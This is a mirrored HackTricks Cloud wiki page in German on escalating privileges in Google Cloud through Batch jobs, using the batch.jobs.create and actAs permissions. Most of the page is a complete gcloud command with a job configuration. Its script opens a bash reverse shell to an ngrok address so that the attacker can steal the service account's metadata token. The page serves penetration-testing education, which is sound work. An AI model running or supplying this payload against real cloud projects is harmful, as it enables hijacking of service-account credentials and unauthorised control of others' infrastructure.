gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-17 15:21:52 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
dd572409a827680ef37bd3d3aade23ad7bc8a7d2
hacktricks-cloud/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md

1.0 KiB
Raw Blame History

GCP - Batch Privesc

{{#include ../../../banners/hacktricks-training.md}}

Batch

Grundlegende Informationen:

{{#ref}} ../gcp-services/gcp-batch-enum.md {{#endref}}

batch.jobs.create, iam.serviceAccounts.actAs

Es ist möglich, einen Batch-Job zu erstellen, eine Reverse-Shell zu erhalten und das Metadaten-Token des SA (standardmäßig Compute SA) zu exfiltrieren.

gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <<EOD
{
"name": "projects/gcp-labs-35jfenjy/locations/us-central1/jobs/job-lxo3b2ub",
"taskGroups": [
{
"taskCount": "1",
"parallelism": "1",
"taskSpec": {
"computeResource": {
"cpuMilli": "1000",
"memoryMib": "512"
},
"runnables": [
{
"script": {
"text": "/bin/bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n"
}
}
],
"volumes": []
}
}
],
"allocationPolicy": {
"instances": [
{
"policy": {
"provisioningModel": "STANDARD",
"machineType": "e2-micro"
}
}
]
},
"logsPolicy": {
"destination": "CLOUD_LOGGING"
}
}
EOD

{{#include ../../../banners/hacktricks-training.md}}

Reference in New Issue View Git Blame Copy Permalink